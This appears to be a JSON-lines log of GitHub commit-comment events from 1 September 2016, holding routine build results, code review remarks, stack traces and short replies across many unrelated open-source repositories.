{"id":"4502205232","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18862821,"position":null,"line":null,"path":null,"commit_id":"fa76e9b0149285d3887d8dac163b5153555af458","created_at":"2016-09-01T12:19:21Z","updated_at":"2016-09-01T12:19:21Z","body":"EP-6-6 (macumber) - Win64-Windows-7-VisualStudio-12: Tests Failed (2172 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fa76e9b0149285d3887d8dac163b5153555af458-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fa76e9b0149285d3887d8dac163b5153555af458-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-88.73%25-red.svg)</a> \n"}},"created_at":"2016-09-01T12:19:21Z"}
{"id":"4502206190","type":"CommitCommentEvent","actor":{"login":"IrlJidel"},"repo":{"name":"drolbr/Overpass-API"},"payload":{"comment":{"id":18862824,"position":null,"line":null,"path":null,"commit_id":"c926fbd83ffa5900a90a21654f225a4d2fcdf235","created_at":"2016-09-01T12:19:36Z","updated_at":"2016-09-01T12:19:36Z","body":"Should the Usage statement report --map-compression-method option as well if HAVE_LZ4 is defined?"}},"created_at":"2016-09-01T12:19:36Z"}
{"id":"4502206774","type":"CommitCommentEvent","actor":{"login":"corez92"},"repo":{"name":"JessicaNgo/TeleGiphy"},"payload":{"comment":{"id":18862825,"position":13,"line":64,"path":"tele_giphy/game/views.py","commit_id":"6f270949afc18ade4bbdcb2ee4ee77019ce3771f","created_at":"2016-09-01T12:19:43Z","updated_at":"2016-09-01T12:19:43Z","body":"ya had that to see if it actually worked thanks for reminding me"}},"created_at":"2016-09-01T12:19:43Z"}
{"id":"4502210831","type":"CommitCommentEvent","actor":{"login":"lautr3k"},"repo":{"name":"openhardwarecoza/LaserWeb4"},"payload":{"comment":{"id":18862828,"position":null,"line":null,"path":null,"commit_id":"ddc39728400aeca738c58d2c71b2b7478fa8fb92","created_at":"2016-09-01T12:20:39Z","updated_at":"2016-09-01T12:20:39Z","body":"No issues, No worries ;) Anyway thank you for yours contributions :)"}},"created_at":"2016-09-01T12:20:39Z"}
{"id":"4502212730","type":"CommitCommentEvent","actor":{"login":"sardarwaqas"},"repo":{"name":"alex011235/FaceSwap"},"payload":{"comment":{"id":18862835,"position":null,"line":null,"path":null,"commit_id":"bbd2d6e05015f4f15a27461770e5778f3c4abf07","created_at":"2016-09-01T12:21:02Z","updated_at":"2016-09-01T12:21:02Z","body":"i download this app and run but it give error on System.loadLibrary(\"nativefaceswap\");\r\ncan you tell me reason .E/AndroidRuntime: FATAL EXCEPTION: main\r\n                                                                       Process: com.tzutalin.dlibtest, PID: 27204\r\n                                                                       java.lang.UnsatisfiedLinkError: dlopen failed: cannot locate symbol \"__aeabi_memmove4\" referenced by \"/data/app/com.tzutalin.dlibtest-1/lib/arm/libnativefaceswap.so\"...\r\n                                                                           at java.lang.Runtime.loadLibrary(Runtime.java:372)\r\n                                                                           at java.lang.System.loadLibrary(System.java:1076)\r\n                                                                           at com.alex.faceswap.FaceSwap.<clinit>(FaceSwap.java:53)\r\n                                                                           at com.alex.faceswap.ActivitySelfieSwap$1.run(ActivitySelfieSwap.java:171)\r\n                                                                           at android.os.Handler.handleCallback(Handler.java:739)\r\n                                                                           at android.os.Handler.dispatchMessage(Handler.java:95)\r\n                                                                           at android.os.Looper.loop(Looper.java:148)\r\n                                                                           at android.app.ActivityThread.main(ActivityThread.java:5417)\r\n                                                                           at java.lang.reflect.Method.invoke(Native Method)\r\n                                                                           at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:726)\r\n                                                                           at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:616)\r\n09-01 17:06:25.469 27204-27204/com.tzutalin.dlibtest I/Process: Sending signal. PID: 27204 SIG: 9"}},"created_at":"2016-09-01T12:21:02Z"}
{"id":"4502217240","type":"CommitCommentEvent","actor":{"login":"ThisTestUser"},"repo":{"name":"mcccs/Wurst-Client-for-MC-1.9.X"},"payload":{"comment":{"id":18862841,"position":null,"line":null,"path":null,"commit_id":"dd8e8a21ad197bd0025045221405ba81e6cb3f0b","created_at":"2016-09-01T12:22:07Z","updated_at":"2016-09-01T12:22:07Z","body":"@mcccs \r\n1. The injection system has been around for a long time, even when Alexander was developing 1.8.\r\n2. The injection system currently has more features, including the ability to uninject (which Würstchen doesn't have)\r\n3. The hacks are coded to make it hard for ANYONE, even legit players to see that you are hacking. I think Incognito has found a way to filter Mineplex entities. "}},"created_at":"2016-09-01T12:22:07Z"}
{"id":"4502217363","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18862843,"position":null,"line":null,"path":null,"commit_id":"e1f9b947990f0584d4173542c7d2774964a95588","created_at":"2016-09-01T12:22:08Z","updated_at":"2016-09-01T12:22:08Z","body":"A plugin is using a deprecated method. Find the plugin and remove it."}},"created_at":"2016-09-01T12:22:08Z"}
{"id":"4502219717","type":"CommitCommentEvent","actor":{"login":"hnakamur"},"repo":{"name":"tenforward/lxd"},"payload":{"comment":{"id":18862847,"position":null,"line":null,"path":null,"commit_id":"767593d08165497d6dd810d4d6bb550eec7438f3","created_at":"2016-09-01T12:22:40Z","updated_at":"2016-09-01T12:22:40Z","body":":+1:"}},"created_at":"2016-09-01T12:22:40Z"}
{"id":"4502225577","type":"CommitCommentEvent","actor":{"login":"Subtixx"},"repo":{"name":"Subtixx/beam-client-csharp"},"payload":{"comment":{"id":18862859,"position":181,"line":163,"path":"beam-client-csharp/BeamWeb.cs","commit_id":"9a7f581e91724c514e0ec402194fc86d6d737d20","created_at":"2016-09-01T12:23:57Z","updated_at":"2016-09-01T12:23:57Z","body":"I could just check if values == null then GET else POST"}},"created_at":"2016-09-01T12:23:57Z"}
{"id":"4502228055","type":"CommitCommentEvent","actor":{"login":"danimaribeiro"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":18862866,"position":null,"line":null,"path":null,"commit_id":"c2fe9fe0e6b7e8d84eabfbdd6f6b69ecd14c4a79","created_at":"2016-09-01T12:24:30Z","updated_at":"2016-09-01T12:24:30Z","body":":-1:  This commit made the statusbar stop working. It does not call the write correctly.\r\n\r\n![write with wrong parameters](https://cloud.githubusercontent.com/assets/854781/18167171/7863d45e-7025-11e6-8634-891ce66dd4dd.png)\r\n\r\nAfter I revert the statusbas bar work properly again, check the args in the write call.\r\n![selecao_001](https://cloud.githubusercontent.com/assets/854781/18167220/c2a1f82a-7025-11e6-93f5-4190368ed057.png)\r\n\r\n\r\n"}},"created_at":"2016-09-01T12:24:30Z"}
{"id":"4502228932","type":"CommitCommentEvent","actor":{"login":"ange521"},"repo":{"name":"TeamFatCat/TransferForPC"},"payload":{"comment":{"id":18862871,"position":null,"line":null,"path":null,"commit_id":"692db45c2646aaf4067e6de16e5d0b79b5d8d198","created_at":"2016-09-01T12:24:42Z","updated_at":"2016-09-01T12:24:42Z","body":"因为我无法导入eclipse中或者studio"}},"created_at":"2016-09-01T12:24:42Z"}
{"id":"4502229510","type":"CommitCommentEvent","actor":{"login":"sedwards2009"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18862872,"position":7,"line":278,"path":"plugins/XmlMaterialProfile/XmlMaterialProfile.py","commit_id":"cb1a36577c8ab6686bb1f83ced2f0e61a09bf3e2","created_at":"2016-09-01T12:24:50Z","updated_at":"2016-09-01T12:24:50Z","body":"It took me a while before I figured out what this does. \"flatten\" might not be the best name. It kind of \"unshares\" or expands the machines tags.\r\n"}},"created_at":"2016-09-01T12:24:50Z"}
{"id":"4502230524","type":"CommitCommentEvent","actor":{"login":"ebassi"},"repo":{"name":"mvaello/gnome-dictionary"},"payload":{"comment":{"id":18862877,"position":98,"line":363,"path":"libgdict/gdict-database-chooser.c","commit_id":"af0696f9a76a92fe89204c7cf2e54832f817d84c","created_at":"2016-09-01T12:25:04Z","updated_at":"2016-09-01T12:25:04Z","body":"Yes, the coding style is a bit of a mess, but in general new code should be written a bit better than what I did 10+ years ago. ;-)"}},"created_at":"2016-09-01T12:25:04Z"}
{"id":"4502232068","type":"CommitCommentEvent","actor":{"login":"CvH"},"repo":{"name":"lekma/tvheadend"},"payload":{"comment":{"id":18862879,"position":null,"line":null,"path":null,"commit_id":"06207f2eb2d175d17f8949888654b388002b02f3","created_at":"2016-09-01T12:25:26Z","updated_at":"2016-09-01T12:25:26Z","body":"@lekma \r\nOkay I see I misinterpreted the whole stuff a bit, so vaapi works for me (even h265 see screenshot) BUT I guess the scaler is the bottleneck (didn't know that there is no hw enabled one). \r\n\r\nIf I transcode some SD -> h264/5 it works okay - if I do it via software it won't work that good (till some resolution).\r\nIf I transcode HD -> h264/5 there it is nearly impossible to transcode even to a very low resolution.\r\n\r\nAt least now I know how it should look like - I will try it with LibreELEC and see if it works there (also the rpi version). The whole problem for me was the tiny difference between sw/hw so I wasn't sure that it works at all.\r\n\r\nI suspect that even at this lowend platform we could reach easily some very good results if vaapi scale/di is there.\r\n\r\n![image](https://cloud.githubusercontent.com/assets/1355173/18167261/e3e7de1c-704f-11e6-90df-a0b6158dc37b.png)\r\n"}},"created_at":"2016-09-01T12:25:26Z"}
{"id":"4502234453","type":"CommitCommentEvent","actor":{"login":"tde-banana-odoo"},"repo":{"name":"tde-banana-odoo/zoo"},"payload":{"comment":{"id":18862887,"position":null,"line":null,"path":null,"commit_id":"ad9dc9b8b4accab4afc0b4aadd1d8ada808a554c","created_at":"2016-09-01T12:25:56Z","updated_at":"2016-09-01T12:25:56Z","body":"Isn't it ?"}},"created_at":"2016-09-01T12:25:56Z"}
{"id":"4502235516","type":"CommitCommentEvent","actor":{"login":"slavakisel"},"repo":{"name":"AlexeyKuznetzov/pdp_junior_ruby_v2"},"payload":{"comment":{"id":18862889,"position":null,"line":null,"path":null,"commit_id":"e13bc2eee5b6fa3a0ad55f815f4dcbe38d05bc9c","created_at":"2016-09-01T12:26:11Z","updated_at":"2016-09-01T12:26:11Z","body":"👍 "}},"created_at":"2016-09-01T12:26:11Z"}
{"id":"4502237506","type":"CommitCommentEvent","actor":{"login":"funerek"},"repo":{"name":"funerek/Test-0"},"payload":{"comment":{"id":18862893,"position":null,"line":null,"path":null,"commit_id":"d41063ae7cb696c0225db8431db96de62ed6c160","created_at":"2016-09-01T12:26:37Z","updated_at":"2016-09-01T12:26:37Z","body":"jest OK"}},"created_at":"2016-09-01T12:26:37Z"}
{"id":"4502238044","type":"CommitCommentEvent","actor":{"login":"andrewlinfoot"},"repo":{"name":"keystonejs/keystone-storage-namefunctions"},"payload":{"comment":{"id":18862895,"position":null,"line":null,"path":null,"commit_id":"dc3ef5cc0ea632dac7b2f48a6104c21da8033566","created_at":"2016-09-01T12:26:44Z","updated_at":"2016-09-01T12:26:44Z","body":"Looks really solid and the documentation you wrote up seemed solid as well. The only question is are we ditching the underscore prefix syntax `_retryFilename` (line 20) vs `retryFilename`(line 56)"}},"created_at":"2016-09-01T12:26:44Z"}
{"id":"4502238082","type":"CommitCommentEvent","actor":{"login":"mircealungu"},"repo":{"name":"nbhaan/Time-To-Learn"},"payload":{"comment":{"id":18862896,"position":7,"line":41,"path":"js/app/session.js","commit_id":"1c0eae5f18b343de8ddcd477a4547b3563c26d70","created_at":"2016-09-01T12:26:44Z","updated_at":"2016-09-01T12:26:44Z","body":"the place of this `ctxWords.font = TRANSLATION_FONT;` line is strange. either move it before return true, or somewhere else... agree?"}},"created_at":"2016-09-01T12:26:44Z"}
{"id":"4502239236","type":"CommitCommentEvent","actor":{"login":"bjdelange"},"repo":{"name":"MyOnlineStore/dbpatcher"},"payload":{"comment":{"id":18862900,"position":15,"line":32,"path":"src/LemonWeb/Deployer/Database/SqlUpdate/AbstractSqlUpdate.php","commit_id":"08d34de31ba869fc8fe7705ba4dcdad1576dd46f","created_at":"2016-09-01T12:26:58Z","updated_at":"2016-09-01T12:26:58Z","body":"De argumenten van array_merge moeten andersom anders kan je `charset` nooit overriden."}},"created_at":"2016-09-01T12:26:58Z"}
{"id":"4502239981","type":"CommitCommentEvent","actor":{"login":"Rich-Harris"},"repo":{"name":"rollup/rollup"},"payload":{"comment":{"id":18862903,"position":3,"line":2,"path":"bin/src/runRollup.js","commit_id":"3de477137ac14e3cac5ae5350d2e4e3728dc4d37","created_at":"2016-09-01T12:27:10Z","updated_at":"2016-09-01T12:27:10Z","body":"Lower down, `rollup` gets passed to `rollup-watch`. In 0.34.11 it was passing the `rollup` function, *not* the namespace."}},"created_at":"2016-09-01T12:27:10Z"}
{"id":"4502244144","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18862914,"position":null,"line":null,"path":null,"commit_id":"baf38c4b7ab8aa9bd0f13d8fc2219af4a4fa3fbe","created_at":"2016-09-01T12:28:06Z","updated_at":"2016-09-01T12:28:06Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#GnNG1DH_SOSKBpSt1QUWhw"}},"created_at":"2016-09-01T12:28:06Z"}
{"id":"4502244812","type":"CommitCommentEvent","actor":{"login":"ronawho"},"repo":{"name":"Qthreads/qthreads"},"payload":{"comment":{"id":18862916,"position":4,"line":5,"path":"include/qt_gcd.h","commit_id":"517dd3da754f87577dd6f47ad405c2c218971fab","created_at":"2016-09-01T12:28:15Z","updated_at":"2016-09-01T12:28:15Z","body":"Should this be `#include <qthread/qthread-int.h>` instead?"}},"created_at":"2016-09-01T12:28:15Z"}
{"id":"4502245526","type":"CommitCommentEvent","actor":{"login":"ryukinix"},"repo":{"name":"rafaelcn/ProjectEuler"},"payload":{"comment":{"id":18862920,"position":null,"line":null,"path":null,"commit_id":"9ad1efc6387b5210f9511b925fc522d1e851d627","created_at":"2016-09-01T12:28:24Z","updated_at":"2016-09-01T12:28:24Z","body":"Great."}},"created_at":"2016-09-01T12:28:24Z"}
{"id":"4502248707","type":"CommitCommentEvent","actor":{"login":"aethaniel"},"repo":{"name":"luc-github/ExperimentalCore-sam"},"payload":{"comment":{"id":18862925,"position":131,"line":124,"path":"module/variants/atmel_sam4e_xplained_pro/variant.cpp","commit_id":"f125d92fbd83e3ca86872180398cc375887637cd","created_at":"2016-09-01T12:29:07Z","updated_at":"2016-09-01T12:29:07Z","body":"Missing AFE1/AD0"}},"created_at":"2016-09-01T12:29:07Z"}
{"id":"4502252814","type":"CommitCommentEvent","actor":{"login":"chrisdamba"},"repo":{"name":"chrisdamba/langpred"},"payload":{"comment":{"id":18862934,"position":null,"line":null,"path":null,"commit_id":"fe16c90f1850b007008bd0a745e6ede78f8ede8c","created_at":"2016-09-01T12:29:59Z","updated_at":"2016-09-01T12:29:59Z","body":"Decided to use MongoDB to persist the raw data from the Wikipedia PagevViews API since it's aggregation framework is robust and efficient in calculating aggregates, besides the fact that this particular NoSQL database has grown on me that it feels more natural and easy to persist the JSON responses."}},"created_at":"2016-09-01T12:29:59Z"}
{"id":"4502257598","type":"CommitCommentEvent","actor":{"login":"wm4"},"repo":{"name":"mpv-player/mpv"},"payload":{"comment":{"id":18862943,"position":null,"line":null,"path":null,"commit_id":"5bcb22beea14bb48a84c610425d5693e0305e434","created_at":"2016-09-01T12:30:59Z","updated_at":"2016-09-01T12:30:59Z","body":"Only single-segment DASH works, segmented DASH doesn't."}},"created_at":"2016-09-01T12:30:59Z"}
{"id":"4502260415","type":"CommitCommentEvent","actor":{"login":"hnakamur"},"repo":{"name":"tenforward/lxd"},"payload":{"comment":{"id":18862948,"position":367,"line":652,"path":"po/ja.po","commit_id":"ef67e7f104e5b5386593f2bc9f9ff0ef6af1e992","created_at":"2016-09-01T12:31:35Z","updated_at":"2016-09-01T12:31:35Z","body":"あー、なるほどー。解説ありがとうございます！"}},"created_at":"2016-09-01T12:31:35Z"}
{"id":"4502261497","type":"CommitCommentEvent","actor":{"login":"kennytm"},"repo":{"name":"Manishearth/rust-clippy"},"payload":{"comment":{"id":18862951,"position":5,"line":5,"path":"CHANGELOG.md","commit_id":"8d231b22a10687c336117bab26f2864ed80153d6","created_at":"2016-09-01T12:31:49Z","updated_at":"2016-09-01T12:31:49Z","body":"Actually these are in the `clippy` and `clippy_pedantic` groups (`#![warn(clippy)]` would enable them). The problem #1207 fixed is that if you wrote `#![deny(for_loop_over_option)]` the compiler would just say it's an \"unknown lint\". This also means if you ran `cargo clippy` without `-- -W clippy`, these four issues wouldn't be detected."}},"created_at":"2016-09-01T12:31:49Z"}
{"id":"4502262030","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system-reference-page"},"payload":{"comment":{"id":18862953,"position":null,"line":null,"path":null,"commit_id":"d0941ba085b0de789f816a5c762adf66faadb0f1","created_at":"2016-09-01T12:31:56Z","updated_at":"2016-09-01T12:31:56Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/352/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-1926-add-fandom-logo)."}},"created_at":"2016-09-01T12:31:56Z"}
{"id":"4502263103","type":"CommitCommentEvent","actor":{"login":"devbence"},"repo":{"name":"modoboa/modoboa-pfxadmin-migrate"},"payload":{"comment":{"id":18862959,"position":null,"line":null,"path":null,"commit_id":"e27797f436854e8c3ab148e6b10bf2a7e00b360d","created_at":"2016-09-01T12:32:11Z","updated_at":"2016-09-01T12:32:11Z","body":"New one:\r\n\r\n> \r\n> Traceback (most recent call last):\r\n>   File \"manage.py\", line 10, in <module>\r\n>     execute_from_command_line(sys.argv)\r\n>   File \"/srv/modoboa/env/local/lib/python2.7/site-packages/django/core/management/__init__.py\", line 353, in execute_from_command_line\r\n>     utility.execute()\r\n>   File \"/srv/modoboa/env/local/lib/python2.7/site-packages/django/core/management/__init__.py\", line 345, in execute\r\n>     self.fetch_command(subcommand).run_from_argv(self.argv)\r\n>   File \"/srv/modoboa/env/local/lib/python2.7/site-packages/django/core/management/base.py\", line 348, in run_from_argv\r\n>     self.execute(*args, **cmd_options)\r\n>   File \"/srv/modoboa/env/local/lib/python2.7/site-packages/django/core/management/base.py\", line 399, in execute\r\n>     output = self.handle(*args, **options)\r\n>   File \"/srv/modoboa/env/local/lib/python2.7/site-packages/modoboa_pfxadmin_migrate/management/commands/migrate_from_postfixadmin.py\", line 290, in handle\r\n>     self._do_migration(options)\r\n>   File \"/srv/modoboa/env/local/lib/python2.7/site-packages/modoboa_pfxadmin_migrate/management/commands/migrate_from_postfixadmin.py\", line 280, in _do_migration\r\n>     self._migrate_domain(pf_domain, options, creator)\r\n>   File \"/srv/modoboa/env/local/lib/python2.7/site-packages/modoboa_pfxadmin_migrate/management/commands/migrate_from_postfixadmin.py\", line 199, in _migrate_domain\r\n>     self._migrate_mailboxes(newdom, options, creator)\r\n>   File \"/srv/modoboa/env/local/lib/python2.7/site-packages/modoboa_pfxadmin_migrate/management/commands/migrate_from_postfixadmin.py\", line 181, in _migrate_mailboxes\r\n>     new_mb = admin_models.Mailbox()\r\n>   File \"/srv/modoboa/env/local/lib/python2.7/site-packages/modoboa/admin/models/mailbox.py\", line 100, in __init__\r\n>     self.old_full_address = self.full_address\r\n>   File \"/srv/modoboa/env/local/lib/python2.7/site-packages/modoboa/admin/models/mailbox.py\", line 110, in full_address\r\n>     return self.__full_address(self.address)\r\n>   File \"/srv/modoboa/env/local/lib/python2.7/site-packages/modoboa/admin/models/mailbox.py\", line 106, in __full_address\r\n>     return \"%s@%s\" % (localpart, self.domain.name)\r\n>   File \"/srv/modoboa/env/local/lib/python2.7/site-packages/django/db/models/fields/related_descriptors.py\", line 179, in __get__\r\n>     \"%s has no %s.\" % (self.field.model.__name__, self.field.name)\r\n> django.db.models.fields.related_descriptors.RelatedObjectDoesNotExist: Mailbox has no domain."}},"created_at":"2016-09-01T12:32:11Z"}
{"id":"4502266572","type":"CommitCommentEvent","actor":{"login":"milosb793"},"repo":{"name":"Myoshu/Work"},"payload":{"comment":{"id":18862967,"position":null,"line":null,"path":null,"commit_id":"af8e324df9aa4461b7e0a195384303e07442fdac","created_at":"2016-09-01T12:32:52Z","updated_at":"2016-09-01T12:32:52Z","body":"  ________  \r\n  |  $$$$ |\r\n<+++++>\r\n / O      O \\\r\n|       o       |\r\n \\      .     /"}},"created_at":"2016-09-01T12:32:52Z"}
{"id":"4502266817","type":"CommitCommentEvent","actor":{"login":"geekbrother"},"repo":{"name":"geeksteam/SHM-api-blueprint"},"payload":{"comment":{"id":18862968,"position":null,"line":null,"path":null,"commit_id":"25a674afd5cd23c75378e25da93cca72a45ba404","created_at":"2016-09-01T12:32:55Z","updated_at":"2016-09-01T12:32:55Z","body":"__apiary.manifest contains references to non-existent files in repository.__ (Autogenerated message from apiary.io)\n+ # Global structs\n+ # Creating test users\n+ ## Authorization ##\n+ # Panel login auth\n+ # Creating test.com and dirs\n+ # HOTP\n+ ### BEGIN ###\n+ ## USERS ##\n+ # User limit Templates\n+ # Users manipulation\n+ # User settings change\n+ ## Files manipulation ##\n+ # Filemanager\n+ # local\n+ # remote\n+ # archives\n+ # content\n+ # list remove\n+ ## FTP server ##\n+ # ProFTPD\n+ ## WebDomains, related ##\n+ # WebDomains and PHP modes\n+ # SSL certificates\n+ # PHP settings and info\n+ ## Databases ##\n+ # MySQL\n+ # Users\n+ # Databases\n+ # PostgreSQL\n+ # Users\n+ # Databases\n+ ## DNS ##\n+ ## User specific ##\n+ # Session info\n+ ## Email ##\n+ # Email exim dovecot\n+ # DKIM \n+ # DNSBlists\n+ # Eximlog\n+ ## Statistics ##\n+ # Site activity analytics\n+ # Nginx current requests\n+ # Watchdog  SYS, NET, Traffic charts\n+ ## System ##\n+ # System time\n+ # Cron\n+ # System packages\n+ # System services\n+ # System Processes\n+ # OpenSSH server settings\n+ # Shell exec\n+ ## Network ##\n+ # IPtables rules\n+ # Fail 2 ban\n+ # System network settings\n+ # IP\n+ ## PANEL ##\n+ # User Messages\n+ # Journal\n+ # Sessions\n+ # Panel Core info\n+ # Panel API triggers\n+ ## BACKUPS ##\n+ # Users backups\n+ ## Third party ##\n+ # Perl modules\n+ # Ruby modules and info\n+ # ClamAV antivirus\n+ ## Plugins ##\n+ # Plugins list\n+ # Slack\n+ # PhpMyAdmin\n+ ### END ###\n+ # Remove dirs and test.com"}},"created_at":"2016-09-01T12:32:55Z"}
{"id":"4502272689","type":"CommitCommentEvent","actor":{"login":"whesse"},"repo":{"name":"dart-lang/co19"},"payload":{"comment":{"id":18862979,"position":null,"line":null,"path":null,"commit_id":"9ba5769c4774311a053075d56d6a824db6e9ae64","created_at":"2016-09-01T12:34:11Z","updated_at":"2016-09-01T12:34:11Z","body":"This commit deleted libbase.lib.dart instead of renaming it."}},"created_at":"2016-09-01T12:34:11Z"}
{"id":"4502274121","type":"CommitCommentEvent","actor":{"login":"hnakamur"},"repo":{"name":"tenforward/lxd"},"payload":{"comment":{"id":18862985,"position":382,"line":670,"path":"po/ja.po","commit_id":"ef67e7f104e5b5386593f2bc9f9ff0ef6af1e992","created_at":"2016-09-01T12:34:25Z","updated_at":"2016-09-01T12:34:25Z","body":"なるほど、そういうことですか。ありがとうございます！"}},"created_at":"2016-09-01T12:34:25Z"}
{"id":"4502275973","type":"CommitCommentEvent","actor":{"login":"lekma"},"repo":{"name":"lekma/tvheadend"},"payload":{"comment":{"id":18862990,"position":null,"line":null,"path":null,"commit_id":"06207f2eb2d175d17f8949888654b388002b02f3","created_at":"2016-09-01T12:34:48Z","updated_at":"2016-09-01T12:34:48Z","body":"the rpi version does not work yet, unfortunately.\r\nand I guess you're right that you might see better perf if/when I get to implement scale and deint in vaapi (side note: scale_vaapi is already in ffmpeg so might want to test with it)."}},"created_at":"2016-09-01T12:34:48Z"}
{"id":"4502280501","type":"CommitCommentEvent","actor":{"login":"ylavoie"},"repo":{"name":"pjlsergeant/test-bdd-cucumber-perl"},"payload":{"comment":{"id":18863015,"position":null,"line":null,"path":null,"commit_id":"061d26609a75b87462a84ec87c83b870bc388bb9","created_at":"2016-09-01T12:35:45Z","updated_at":"2016-09-01T12:35:45Z","body":"It works wonderfully. Thanks for the quick response."}},"created_at":"2016-09-01T12:35:45Z"}
{"id":"4502283003","type":"CommitCommentEvent","actor":{"login":"fieldOfView"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18863029,"position":5,"line":466,"path":"resources/qml/Cura.qml","commit_id":"a2f478f2ad9df16e62f40406cf913957d3fac3f1","created_at":"2016-09-01T12:36:16Z","updated_at":"2016-09-01T12:36:16Z","body":"Is the `null` just for clarity here? I would have thought the two lines are equivalent."}},"created_at":"2016-09-01T12:36:16Z"}
{"id":"4502286249","type":"CommitCommentEvent","actor":{"login":"dacap"},"repo":{"name":"aseprite/aseprite"},"payload":{"comment":{"id":18863039,"position":null,"line":null,"path":null,"commit_id":"5ecc356a41c8e29977f8608d8826489d24f5fa6c","created_at":"2016-09-01T12:36:54Z","updated_at":"2016-09-01T12:36:54Z","body":"@raetiacorvus hi sirlbackheart, in the case of Arch User Repository, you should be able to still distribute the script. The code will be available to download and compile it locally, so if the script does that, it's just fine."}},"created_at":"2016-09-01T12:36:54Z"}
{"id":"4502292398","type":"CommitCommentEvent","actor":{"login":"danieleds"},"repo":{"name":"danieleds/exceljs"},"payload":{"comment":{"id":18863050,"position":14,"line":256,"path":"lib/stream/xlsx/workbook-writer.js","commit_id":"d5011ba46c5192942d1aa7aa6790a2a0459b54e3","created_at":"2016-09-01T12:38:10Z","updated_at":"2016-09-01T12:38:10Z","body":"@drakosha I've just tried to stay consistent with how it's done in the other places within this file."}},"created_at":"2016-09-01T12:38:10Z"}
{"id":"4502294853","type":"CommitCommentEvent","actor":{"login":"warrenbuckley"},"repo":{"name":"umbraco/OurUmbraco"},"payload":{"comment":{"id":18863058,"position":null,"line":null,"path":null,"commit_id":"088ce651c8dbeb79c3ef7f42553c625718a21c79","created_at":"2016-09-01T12:38:40Z","updated_at":"2016-09-01T12:38:40Z","body":"@nul800sebastiaan this seems fine to me to get members to accept the new terms. Off to clone & test this out"}},"created_at":"2016-09-01T12:38:40Z"}
{"id":"4502297639","type":"CommitCommentEvent","actor":{"login":"yrashk"},"repo":{"name":"npgall/cqengine"},"payload":{"comment":{"id":18863069,"position":null,"line":null,"path":null,"commit_id":"f4fd2e6b2b829fc982c2307ea54f11ee3dc0ad43","created_at":"2016-09-01T12:39:18Z","updated_at":"2016-09-01T12:39:18Z","body":"Yeah, the way I did type discovery is slightly different. Arguably, it is not perfect either, as it imposes a number of restrictions and is a bit hacky. Basically, what I do is... I require such definition to be a public static non-final field and I infer types from the field (and I get the fields by simply scanning the class). The hackiest part is that in order to create an actual attribute, I am (so far) forced to replace the value of this non-final static field with another instance (i.e. I am replacing the implementation of the functional interface with another one that has an actual *Attribute wrapped into it). This only works if there's an \"initialization\" procedure (which I have in the architecture) and it definitely requires a non-final field. Overall, I don't like this hack — but it does work.\r\n\r\n"}},"created_at":"2016-09-01T12:39:18Z"}
{"id":"4502299597","type":"CommitCommentEvent","actor":{"login":"GrahamCampbell"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":18863073,"position":null,"line":null,"path":null,"commit_id":"0135851f1a684bbc2f700bf8523fea295825f7ce","created_at":"2016-09-01T12:39:42Z","updated_at":"2016-09-01T12:39:42Z","body":"What? How could this change do that. Please explain."}},"created_at":"2016-09-01T12:39:42Z"}
{"id":"4502300819","type":"CommitCommentEvent","actor":{"login":"jonmbake"},"repo":{"name":"jonmbake/discourse-ldap-auth"},"payload":{"comment":{"id":18863075,"position":null,"line":null,"path":null,"commit_id":"90a80c83926cba2253a88cfed95a145370411d03","created_at":"2016-09-01T12:39:57Z","updated_at":"2016-09-01T12:39:57Z","body":"Good idea and done: https://github.com/jonmbake/discourse-ldap-auth/commit/414ba9f2d4f84d2dc584327f4545a04ada5fc98e. The default value for `ldap_bind_dn` is an empty string (and ruby doesn't treat these as \"truthy\") so I think we had to use `#present`.\r\n\r\nAn issue was also created for a future release: https://github.com/jonmbake/discourse-ldap-auth/issues/12."}},"created_at":"2016-09-01T12:39:57Z"}
{"id":"4502301862","type":"CommitCommentEvent","actor":{"login":"GrahamCampbell"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":18863080,"position":null,"line":null,"path":null,"commit_id":"0135851f1a684bbc2f700bf8523fea295825f7ce","created_at":"2016-09-01T12:40:10Z","updated_at":"2016-09-01T12:40:10Z","body":"Oh, I see."}},"created_at":"2016-09-01T12:40:10Z"}
{"id":"4502302508","type":"CommitCommentEvent","actor":{"login":"GrahamCampbell"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":18863082,"position":null,"line":null,"path":null,"commit_id":"0135851f1a684bbc2f700bf8523fea295825f7ce","created_at":"2016-09-01T12:40:17Z","updated_at":"2016-09-01T12:40:17Z","body":"FFS."}},"created_at":"2016-09-01T12:40:17Z"}
